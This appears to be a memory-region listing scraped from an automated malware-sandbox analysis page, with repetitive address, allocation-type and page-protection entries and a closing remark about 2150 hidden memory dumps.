page execute read
29CA000
heap
page read and write
401000
unkown
page execute read
608B000
heap
page read and write
B59000
heap
page read and write
5981000
heap
page read and write
4F21000
heap
page read and write
2041000
heap
page read and write
727000
heap
page read and write
B00000
heap
page read and write
2C2E000
stack
page read and write
26E0000
trusted library allocation
page read and write
750000
heap
page read and write
BB4000
heap
page read and write
608E000
heap
page read and write
BB1000
heap
page read and write
27D000
unkown
page read and write
113CA5F8000
heap
page read and write
10094000
direct allocation
page read and write
250000
unkown
page readonly
4F2E000
heap
page read and write
2190000
heap
page read and write
113CA624000
heap
page read and write
2041000
heap
page read and write
48E000
stack
page read and write
138F8EA3000
heap
page read and write
9B000
stack
page read and write
26E0000
trusted library allocation
page read and write
4B4000
heap
page read and write
4F62000
heap
page read and write
554000
heap
page read and write
BB8000
heap
page read and write
113CA7E0000
heap
page read and write
10094000
direct allocation
page read and write
138000
unkown
page readonly
2623000
heap
page read and write
2059000
heap
page read and write
5510000
trusted library allocation
page read and write
3060000
heap
page read and write
113CA652000
heap
page read and write
6C9A4000
unkown
page read and write
3420000
direct allocation
page read and write
11DD6FF000
stack
page read and write
BB4000
heap
page read and write
BC3000
heap
page read and write
2059000
heap
page read and write
BC3000
heap
page read and write
CCF000
stack
page read and write
BC4000
heap
page read and write
BC8000
heap
page read and write
3420000
direct allocation
page read and write
1EF2000
heap
page read and write
BAF000
heap
page read and write
410000
heap
page read and write
113CA656000
heap
page read and write
113CA63F000
heap
page read and write
BC4000
heap
page read and write
4A4000
heap
page read and write
4E4000
heap
page read and write
BA5000
heap
page read and write
2041000
heap
page read and write
402000
unkown
page readonly
2059000
heap
page read and write
5981000
heap
page read and write
1B76F4F0000
heap
page read and write
B4F000
heap
page read and write
3B00000
heap
page read and write
BAF000
heap
page read and write
BB8000
heap
page read and write
10D0000
heap
page read and write
3B60000
direct allocation
page read and write
401000
unkown
page execute read
BC4000
heap
page read and write
617000
heap
page read and write
B45000
heap
page read and write
BB8000
heap
page read and write
10630000
direct allocation
page read and write
2F38000
heap
page read and write
33AF000
stack
page read and write
5510000
trusted library allocation
page read and write
BC3000
heap
page read and write
BC3000
heap
page read and write
5510000
trusted library allocation
page read and write
BB8000
heap
page read and write
BC3000
heap
page read and write
4A4000
heap
page read and write
564000
heap
page read and write
69B000
heap
page read and write
614000
heap
page read and write
659000
heap
page read and write
10001000
direct allocation
page execute read
2059000
heap
page read and write
400000
unkown
page readonly
BAF000
heap
page read and write
401000
unkown
page execute read
1F0000
heap
page read and write
B57000
heap
page read and write
19D000
stack
page read and write
BAF000
heap
page read and write
10094000
direct allocation
page read and write
269E000
stack
page read and write
2059000
heap
page read and write
B65000
heap
page read and write
425D000
stack
page read and write
560000
heap
page read and write
37F0000
trusted library allocation
page read and write
26A0000
direct allocation
page read and write
2A5F000
stack
page read and write
11DD4FA000
stack
page read and write
39B0000
direct allocation
page read and write
10094000
direct allocation
page read and write
2041000
heap
page read and write
BB8000
heap
page read and write
6A6000
heap
page read and write
B56000
heap
page read and write
6C8F0000
unkown
page readonly
1310000
heap
page read and write
26E0000
trusted library allocation
page read and write
26E0000
trusted library allocation
page read and write
BB8000
heap
page read and write
BA5000
heap
page read and write
57C1000
heap
page read and write
2EA0000
heap
page read and write
10001000
direct allocation
page execute read
113CA637000
heap
page read and write
370000
heap
page read and write
2081000
heap
page read and write
10001000
direct allocation
page execute read
3B20000
direct allocation
page read and write
BAF000
heap
page read and write
10630000
direct allocation
page read and write
6CE5F000
unkown
page read and write
950000
heap
page read and write
5D4000
heap
page read and write
BC3000
heap
page read and write
251000
unkown
page execute read
250000
unkown
page readonly
2090000
heap
page read and write
B89000
heap
page read and write
37F0000
trusted library allocation
page read and write
5510000
trusted library allocation
page read and write
5C0000
heap
page read and write
1006B000
direct allocation
page execute read
65D000
heap
page read and write
A8A000
heap
page read and write
550000
heap
page read and write
2041000
heap
page read and write
25BF000
stack
page read and write
4A4000
heap
page read and write
BC8000
heap
page read and write
2041000
heap
page read and write
5D4000
heap
page read and write
400000
unkown
page readonly
138F8E94000
heap
page read and write
5802000
heap
page read and write
1F0000
heap
page read and write
39B0000
direct allocation
page read and write
BC3000
heap
page read and write
37F0000
trusted library allocation
page read and write
26E0000
trusted library allocation
page read and write
590000
heap
page read and write
402000
unkown
page readonly
608E000
heap
page read and write
2050000
heap
page read and write
400000
unkown
page readonly
544000
heap
page read and write
3010000
heap
page read and write
5910000
heap
page read and write
138F8EA9000
heap
page read and write
2041000
heap
page read and write
BAC000
heap
page read and write
B97000
heap
page read and write
1009A000
direct allocation
page execute read
2041000
heap
page read and write
4B4000
heap
page read and write
1001E000
direct allocation
page readonly
601C000
heap
page read and write
508D000
heap
page read and write
BAF000
heap
page read and write
5510000
trusted library allocation
page read and write
2059000
heap
page read and write
1EF0000
heap
page read and write
5802000
heap
page read and write
2D2F000
stack
page read and write
10094000
direct allocation
page read and write
10000000
direct allocation
page read and write
135A000
heap
page read and write
250000
unkown
page readonly
BB8000
heap
page read and write
BB1000
heap
page read and write
3420000
direct allocation
page read and write
113CA648000
heap
page read and write
BA5000
heap
page read and write
5091000
heap
page read and write
402000
unkown
page readonly
59B3000
heap
page read and write
2059000
heap
page read and write
10000
unkown
page readonly
26F09FE000
stack
page read and write
5510000
trusted library allocation
page read and write
65D000
heap
page read and write
3800000
heap
page read and write
6C8F1000
unkown
page execute read
710000
heap
page read and write
AF7000
stack
page read and write
2F00000
heap
page read and write
BB4000
heap
page read and write
614000
heap
page read and write
78E000
heap
page read and write
26B0000
direct allocation
page read and write
4F60000
heap
page read and write
280000
unkown
page readonly
3802000
heap
page read and write
2059000
heap
page read and write
BAF000
heap
page read and write
BAF000
heap
page read and write
11C0000
heap
page read and write
2059000
heap
page read and write
29B7000
heap
page read and write
3420000
direct allocation
page read and write
4F8D000
heap
page read and write
10001000
direct allocation
page execute read
64B000
heap
page read and write
4FB1000
heap
page read and write
509A000
heap
page read and write
DD0000
heap
page read and write
BC4000
heap
page read and write
9BA000
heap
page read and write
402000
unkown
page readonly
37F0000
trusted library allocation
page read and write
13E0000
heap
page read and write
138F8E20000
heap
page read and write
2041000
heap
page read and write
2980000
direct allocation
page read and write
5510000
trusted library allocation
page read and write
BB4000
heap
page read and write
BAC000
heap
page read and write
439D000
stack
page read and write
BC3000
heap
page read and write
37F0000
trusted library allocation
page read and write
6C9A9000
unkown
page readonly
BA5000
heap
page read and write
5CA000
heap
page read and write
BA5000
heap
page read and write
113CA610000
heap
page read and write
BB8000
heap
page read and write
BB4000
heap
page read and write
710000
heap
page read and write
260F000
direct allocation
page execute and read and write
BC3000
heap
page read and write
BC8000
heap
page read and write
2150000
heap
page read and write
26D000
unkown
page readonly
1009A000
direct allocation
page execute read
BA5000
heap
page read and write
51E000
stack
page read and write
1F90000
heap
page read and write
BB4000
heap
page read and write
590F000
stack
page read and write
65D000
heap
page read and write
4F6E000
heap
page read and write
BC3000
heap
page read and write
21A0000
trusted library allocation
page read and write
2C50000
heap
page read and write
4B4000
heap
page read and write
19D000
stack
page read and write
4FB1000
heap
page read and write
11000
unkown
page execute read
37F0000
trusted library allocation
page read and write
400000
unkown
page readonly
BAF000
heap
page read and write
52E000
stack
page read and write
544000
heap
page read and write
138F8E9B000
heap
page read and write
61F000
heap
page read and write
BB4000
heap
page read and write
2EF0000
heap
page read and write
DC0000
heap
page read and write
474000
heap
page read and write
BAF000
heap
page read and write
1440000
heap
page read and write
BB8000
heap
page read and write
26E0000
trusted library allocation
page read and write
10067000
direct allocation
page read and write
4B4000
heap
page read and write
9B000
stack
page read and write
2F50000
heap
page read and write
50A000
heap
page read and write
2B7E000
stack
page read and write
9C000
stack
page read and write
113CA646000
heap
page read and write
4F2E000
heap
page read and write
BC8000
heap
page read and write
26A0000
direct allocation
page read and write
626000
heap
page read and write
26E0000
trusted library allocation
page read and write
26D4000
heap
page read and write
A2C7C7D000
stack
page read and write
2340000
heap
page read and write
44E000
stack
page read and write
26F0DFF000
stack
page read and write
19D000
stack
page read and write
BC8000
heap
page read and write
B48000
heap
page read and write
BC3000
heap
page read and write
BAF000
heap
page read and write
4A4000
heap
page read and write
5D4000
heap
page read and write
4E7F000
stack
page read and write
2040000
heap
page read and write
2041000
heap
page read and write
2041000
heap
page read and write
402000
unkown
page readonly
6C8F0000
unkown
page readonly
26E0000
trusted library allocation
page read and write
4FB1000
heap
page read and write
6CE61000
unkown
page write copy
BAF000
heap
page read and write
45E000
stack
page read and write
2041000
heap
page read and write
37F0000
trusted library allocation
page read and write
5195000
heap
page read and write
2059000
heap
page read and write
756000
heap
page read and write
2170000
heap
page read and write
624000
heap
page read and write
2059000
heap
page read and write
4B4000
heap
page read and write
26D000
unkown
page readonly
450000
heap
page read and write
609C000
heap
page read and write
251000
unkown
page execute read
5195000
heap
page read and write
5510000
trusted library allocation
page read and write
26E0000
trusted library allocation
page read and write
BC3000
heap
page read and write
6C0000
trusted library allocation
page read and write
BB8000
heap
page read and write
6C9A9000
unkown
page readonly
6C8F0000
unkown
page readonly
26E0000
trusted library allocation
page read and write
146F000
stack
page read and write
401000
unkown
page execute read
20F0000
heap
page read and write
476000
heap
page read and write
E75000
heap
page read and write
22E0000
heap
page read and write
37F0000
trusted library allocation
page read and write
251000
unkown
page execute read
A80000
heap
page read and write
42CC000
stack
page read and write
BA5000
heap
page read and write
138F8E9D000
heap
page read and write
BC3000
heap
page read and write
30000
unkown
page read and write
601000
heap
page read and write
2610000
heap
page read and write
5E5000
heap
page read and write
1FE0000
heap
page read and write
4A4000
heap
page read and write
1B76F580000
heap
page read and write
6C9A4000
unkown
page read and write
E60000
unkown
page readonly
26E0000
trusted library allocation
page read and write
BA5000
heap
page read and write
2E5E000
stack
page read and write
BAF000
heap
page read and write
6C8F0000
unkown
page readonly
2D2F000
stack
page read and write
26F0AFE000
stack
page read and write
26E0000
trusted library allocation
page read and write
2E2F000
stack
page read and write
113CA610000
heap
page read and write
19D000
stack
page read and write
5981000
heap
page read and write
1FD0000
heap
page read and write
2A6B000
heap
page read and write
37F0000
trusted library allocation
page read and write
608E000
heap
page read and write
26E0000
trusted library allocation
page read and write
BAF000
heap
page read and write
BB4000
heap
page read and write
59FF000
stack
page read and write
B40000
heap
page read and write
700000
heap
page read and write
3390000
trusted library allocation
page read and write
BB8000
heap
page read and write
E70000
heap
page read and write
1001E000
direct allocation
page readonly
BC3000
heap
page read and write
5510000
trusted library allocation
page read and write
402000
unkown
page readonly
410000
heap
page read and write
BBA000
heap
page read and write
BC4000
heap
page read and write
There are 2150 hidden memdumps, click here to show them.